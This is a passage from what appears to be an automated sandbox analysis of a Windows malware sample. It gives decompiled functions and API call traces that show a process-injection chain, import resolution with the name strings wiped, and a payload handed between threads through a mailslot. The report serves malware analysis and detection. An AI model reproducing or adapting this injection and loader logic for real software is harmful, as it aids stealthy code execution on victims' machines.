    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
